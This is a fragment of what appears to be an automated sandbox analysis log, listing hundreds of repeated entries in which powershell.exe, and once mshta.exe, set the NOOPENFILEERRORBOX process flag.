            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
